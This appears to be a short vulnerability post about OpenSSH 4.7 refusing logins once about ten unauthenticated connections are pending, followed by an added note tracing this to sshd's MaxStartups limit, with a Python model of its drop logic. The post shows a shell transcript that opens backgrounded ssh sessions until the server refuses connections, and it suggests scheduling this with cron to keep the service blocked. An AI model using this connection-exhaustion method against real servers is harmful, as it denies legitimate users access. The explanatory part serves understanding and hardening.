OpenSSH 4.X DoS (maybe...)

OpenSSH 4.X denies remote connections.

The service itself doesn't crash, but it does NOT allow anyone to connect after 10 or so pending connections.

To reproduce:

telnet 22
Connected to
Escape character is '^]'.
SSH-2.0-OpenSSH_4.7p1 Debian-2
Protocol mismatch.
Connection closed by foreign host.

darkstar# ssh
The authenticity of host ' (' can't be established.
RSA key fingerprint is f9:10:92:7d:8b:70:cb:fe:1c:40:13:7b:6c:e7:d0:bf.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '' (RSA) to the list of known hosts.
root@xxxxxxxx's password:
darkstar# ssh
darkstar# ssh &
[1] 12945
darkstar# ssh &
[2] 12946
darkstar# ssh &
[3] 12947
darkstar# ssh &
[4] 12948
darkstar# ssh &
[5] 12949
darkstar# ssh &
[6] 12950
darkstar# ssh &
[7] 12951
darkstar# ssh &
[8] 12952
darkstar# ssh &
[9] 12953
darkstar# ssh &
[10] 12954
darkstar# ssh &
[11] 12955
ssh_exchange_identification: Connection closed by remote host

An attacker could cronjob a script to force this condition to remain true.

This will prevent anyone else from connecting to the service. Normal behaviour?

Shouts: burnout,spithash princess^pookie, #codemasters
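
The refusal after about 10 pending connections is consistent with sshd's MaxStartups limit on concurrent unauthenticated connections (see sshd_config(5)); each slot stays occupied until authentication succeeds or LoginGraceTime expires. The sketch below is an added example, not part of the original post and not OpenSSH's own code: it models that admission check for a single-value setting and for the start:rate:full random-early-drop form, and its function names and sample settings are constructed for illustration.

```python
# Added example: models sshd's MaxStartups admission check (start:rate:full).
# Function names and the sample settings are constructed for illustration.

def parse_max_startups(value):
    """Parse 'N' or 'start:rate:full' as written in sshd_config."""
    parts = [int(p) for p in value.split(":")]
    if len(parts) == 1:
        # Single value: hard limit, no random early drop.
        return parts[0], 100, parts[0]
    if len(parts) != 3:
        raise ValueError("expected N or start:rate:full")
    start, rate, full = parts
    if not (0 < start <= full and 1 <= rate <= 100):
        raise ValueError("invalid MaxStartups values")
    return start, rate, full


def drop_percent(pending, setting):
    """Percent chance that a new connection is refused while `pending`
    unauthenticated connections are already open."""
    start, rate, full = parse_max_startups(setting)
    if pending < start:
        return 0
    if pending >= full or rate == 100:
        return 100
    # Linear ramp from `rate` at `start` up to 100 at `full` (integer math).
    return rate + (100 - rate) * (pending - start) // (full - start)


def first_refusal(setting, limit=1000):
    """Smallest pending count at which every new connection is refused."""
    for pending in range(limit):
        if drop_percent(pending, setting) == 100:
            return pending
    return None


if __name__ == "__main__":
    # "10" is the hard limit seen in the post; "10:30:60" enables early drop.
    for setting in ("10", "10:30:60"):
        ramp = [(n, drop_percent(n, setting)) for n in (9, 10, 35, 60)]
        print(setting, ramp, "all refused at", first_refusal(setting))
```

With a single value every new connection is refused as soon as the limit is reached; the three-value form starts refusing probabilistically at start and only refuses everything at full, and a shorter LoginGraceTime frees idle slots sooner.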
